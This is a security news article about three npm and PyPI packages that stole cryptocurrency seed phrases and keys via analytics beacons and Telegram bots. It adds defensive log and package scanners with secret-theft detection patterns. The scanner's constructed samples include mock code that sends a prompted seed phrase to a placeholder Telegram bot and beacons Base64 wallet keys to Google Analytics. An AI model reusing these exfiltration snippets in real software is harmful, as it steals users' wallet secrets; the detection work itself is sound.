Wednesday, May 28, 2025

Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft


The Socket Threat Research Team has identified three malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to quietly steal cryptocurrency secrets, including mnemonic seed phrases and private keys.

Published between 2021 and 2024 under the guise of harmless developer tools, these packages have been downloaded thousands of times, illustrating the growing trend of software supply chain attacks against open-source ecosystems.

Subtle Subversion in Open Source

The npm package react-native-scrollpageviewtest, which poses as a page-scrolling helper, has been downloaded 1,215 times.


It combines code obfuscation with evasion techniques to avoid static inspection.

Once installed, it dynamically loads the host application's React Native wallet engine to extract sensitive data, encodes it in Base64, and exfiltrates it to the attacker by sending it as telemetry to a Google Analytics endpoint.

Because traffic to Google's analytics domains is common on developer machines and rarely blocked or inspected, the beacons blend in with legitimate telemetry, and the channel borrows the trust placed in Google's services.
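Exfiltration over an analytics beacon is visible in egress or proxy logs if you decode what the beacons carry. The following is an added example, not code from Socket's report or from the malicious package: it parses constructed proxy log lines, Base64-decodes the query parameters of requests to Google Analytics hosts, and flags payloads that look like a 12- or 24-word mnemonic or a 64-hex-character private key. The log format, the `/collect` endpoint and the `ea` parameter are assumptions (the page only says Google Analytics was used), and the mnemonic check is a shape heuristic, not a BIP39 wordlist lookup.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# Hosts whose beacons we inspect (assumed list, extend for your environment).
ANALYTICS_HOSTS = {"www.google-analytics.com", "google-analytics.com", "analytics.google.com"}

# Assumed proxy log format: <timestamp> <client-ip> <method> <url> <bytes>
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<bytes>\d+)$")

# Heuristics: 12 or 24 lowercase words of 3-8 letters, or a 64-hex-char key with optional 0x.
MNEMONIC_RE = re.compile(r"^(?:[a-z]{3,8} ){11}[a-z]{3,8}$|^(?:[a-z]{3,8} ){23}[a-z]{3,8}$")
PRIVKEY_RE = re.compile(r"^(?:0x)?[0-9a-fA-F]{64}$")


def decode_b64(value):
    """Return the ASCII text behind a Base64 parameter, or None if it is not one."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return None


def classify_secret(text):
    """Label decoded text as a wallet secret type, or None if it looks harmless."""
    t = text.strip()
    if PRIVKEY_RE.match(t):
        return "private-key"
    if MNEMONIC_RE.match(t):
        return "mnemonic"
    return None


def scan_log(log_text):
    """Return one finding per analytics beacon whose Base64 parameter decodes to a secret."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        if url.hostname not in ANALYTICS_HOSTS:
            continue
        for param, values in parse_qs(url.query).items():
            for v in values:
                decoded = decode_b64(v)
                if decoded is None:
                    continue
                kind = classify_secret(decoded)
                if kind:
                    findings.append({"ts": m["ts"], "src": m["src"], "param": param, "kind": kind})
    return findings


def build_sample_log():
    """Constructed log, not real traffic: two beacons from one host carry encoded secrets."""
    seed = "poetry apple bundle camera dance eagle fabric garden hammer index jungle kitchen"
    key = "0x" + "ab" * 32  # dummy 32-byte key in hex

    def beacon(ts, src, payload):
        b64 = base64.b64encode(payload.encode()).decode()
        return (f"{ts} {src} POST https://www.google-analytics.com/collect"
                f"?v=1&tid=UA-000000-1&t=event&ea={quote(b64, safe='')} {300 + len(b64)}")

    return "\n".join([
        beacon("2025-05-20T10:01:02Z", "10.0.0.12", seed),
        "2025-05-20T10:01:09Z 10.0.0.12 GET https://registry.npmjs.org/react-native-scrollpageviewtest 1820",
        "2025-05-20T10:02:15Z 10.0.0.33 POST https://www.google-analytics.com/collect"
        "?v=1&tid=UA-000000-1&t=pageview&dp=%2Fhome 180",
        beacon("2025-05-20T10:03:44Z", "10.0.0.12", key),
    ])


if __name__ == "__main__":
    for f in scan_log(build_sample_log()):
        print(f"{f['ts']} {f['src']} param={f['param']} kind={f['kind']}")
```

In practice, run this over proxy or DNS-plus-TLS-SNI logs from build agents and developer workstations, and replace the word-shape heuristic with a check against the BIP39 wordlist to cut false positives; a legitimate analytics event almost never contains a Base64 blob that decodes to twelve dictionary words.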

On PyPI, web3x and herewalletbot use similar tactics with different delivery mechanisms.

web3x, presented as an Ethereum balance checker, has 3,405 downloads.

It tricks users into entering their seed phrase in order to "check" a wallet balance, then sends the captured phrase to a Telegram bot controlled by the attackers.

herewalletbot, with 3,425 downloads, automates the process further: it walks users through a Telegram chat interface that prompts them for their mnemonic seed phrase, which is harvested without their knowledge.

The Deceptive Dance with Developers

According to Socket's report, these packages illustrate how current supply chain threats operate.

By embedding themselves in development tools and workflows, they are positioned to intercept the most sensitive information a developer handles, trading on the trust developers place in open-source packages.

Such packages compromise not only individual developers but also pose systemic risk to organizations that build software on these ecosystems.

That these packages remained available on npm and PyPI until recently highlights the need for stronger security controls across the software supply chain.

Developers and organizations must adopt proactive security measures like source-code review, runtime behavior monitoring, and dependency analysis to safeguard against such threats.

This discovery serves as a stark reminder of the critical importance of vigilance in software component usage.

Developers are urged never to share their mnemonic seed phrase or private keys under any circumstances, as these are the keys to their digital assets; no legitimate balance checker or helper library needs them.

Any package that requests such information, or that sends data to a Telegram bot or an analytics endpoint for no apparent reason, should be treated as suspicious and reported to the registry.

Indicators of Compromise (IOCs)

Malicious Package | Alias | Downloads | Email/Endpoint
react-native-scrollpageviewtest | twoplus | 1,215 | twoplusten@163[.]com
web3x | tonymevbots | 3,405 | xeallmail@mitico[.]org
herewalletbot | vannszs | 3,425 | bevansatria@gmail[.]com, @herewalletbot, hxxps://web[.]telegram[.]org/k/#@herewalletbot
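The dependency analysis and source review the article recommends, and the IOC table above, can be combined in a single triage pass over a project's installed packages. The following is an added example and not Socket's tooling or any code from the packages: it checks package names against the three names in the IOC table and scans each package's source for the behaviours described above (prompting for a seed phrase or private key, contacting the Telegram Bot API, beaconing to Google Analytics, Base64-encoding data, and dynamically loading a wallet module). The sample package sources are constructed for the example, the module name `./wallet-engine` is hypothetical, and the patterns are heuristics that will need tuning against real code.

```python
import re

# Package names taken from the IOC table above.
KNOWN_MALICIOUS = {"react-native-scrollpageviewtest", "web3x", "herewalletbot"}

# Heuristic source patterns (assumed; the real packages' code is not shown on this page).
RULES = {
    "prompts-for-wallet-secret": re.compile(
        r"\b(input|prompt|getpass|readline|question)\s*\([^)\n]*"
        r"(seed|mnemonic|recovery phrase|private key)", re.I),
    "telegram-bot-endpoint": re.compile(r"api\.telegram\.org/bot|\bt\.me/", re.I),
    "analytics-beacon": re.compile(r"google-analytics\.com/", re.I),
    "base64-encoding": re.compile(
        r"\bbtoa\s*\(|b64encode\s*\(|toString\(\s*[\"']base64[\"']\s*\)", re.I),
    "dynamic-wallet-load": re.compile(r"(require|import)\s*\([^)\n]*wallet", re.I),
}

# A package that both touches secrets and has an exfiltration channel is worth a human look.
EXFIL_RULES = {"telegram-bot-endpoint", "analytics-beacon"}
SECRET_RULES = {"prompts-for-wallet-secret", "dynamic-wallet-load"}


def scan_package(name, files):
    """files maps a path inside the package to its source text."""
    hits = set()
    for _path, src in files.items():
        for rule, rx in RULES.items():
            if rx.search(src):
                hits.add(rule)
    if name in KNOWN_MALICIOUS:
        verdict = "known-malicious"
    elif hits & EXFIL_RULES and hits & SECRET_RULES:
        verdict = "suspicious"
    else:
        verdict = "no-findings"
    return {"package": name, "verdict": verdict, "hits": sorted(hits)}


def scan_all(packages):
    """packages maps package name -> {path: source}; returns one result per package."""
    return [scan_package(name, files) for name, files in packages.items()]


# Constructed sample sources, not the real packages' code.
SAMPLE_PACKAGES = {
    # Mimics the described web3x behaviour: asks for a seed phrase, posts it to Telegram.
    "web3x": {"web3x/__init__.py": '''
import requests
phrase = input("Enter your wallet seed phrase to check the balance: ")
requests.post("https://api.telegram.org/bot0000:TOKEN/sendMessage",
              data={"chat_id": "0", "text": phrase})
'''},
    # Hypothetical name; mimics the described npm behaviour: load wallet module,
    # Base64-encode the keys, beacon to Google Analytics.
    "scroll-helper": {"index.js": '''
const wallet = require("./wallet-engine");
const payload = Buffer.from(JSON.stringify(wallet.exportKeys())).toString("base64");
fetch("https://www.google-analytics.com/collect?v=1&t=event&ea=" + payload);
'''},
    # Benign helper that actually scrolls pages.
    "tiny-scroll": {"index.js": '''
export function scrollTo(view, page) {
  view.scrollTo({ x: page * view.width, animated: true });
}
'''},
}


if __name__ == "__main__":
    for r in scan_all(SAMPLE_PACKAGES):
        print(f"{r['package']:<16} {r['verdict']:<16} {', '.join(r['hits'])}")
```

Wire this into CI against `node_modules` and `site-packages` after install, and treat a `suspicious` verdict as a blocking review, not a warning; name matching alone is not enough, because the same authors publish under new names once a package is taken down.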


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
